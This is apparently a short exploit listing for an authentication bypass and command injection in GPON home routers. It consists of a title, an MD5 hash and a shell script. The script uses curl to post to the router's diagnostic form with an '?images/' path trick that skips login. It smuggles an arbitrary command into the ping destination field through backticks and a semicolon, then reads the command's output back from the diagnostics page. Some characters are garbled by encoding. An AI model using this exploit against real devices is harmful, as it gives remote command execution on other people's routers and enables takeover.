GPON Router Authentication Bypass / Comand Injection

GPON routers suffer from authentication bypass and command injection vulnerabilities.

MD5 | 7af9682ee92aebd41743bf56d2a90b85


echo "[+] Sending the Commanda| "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waitinga|."
sleep 3
echo "[+] Retrieving the ouputa|."
curl -k $1/diag.html?images/ 2>/dev/null | grep adiag_result = a | sed -e as/\\n/\n/ga

Related Posts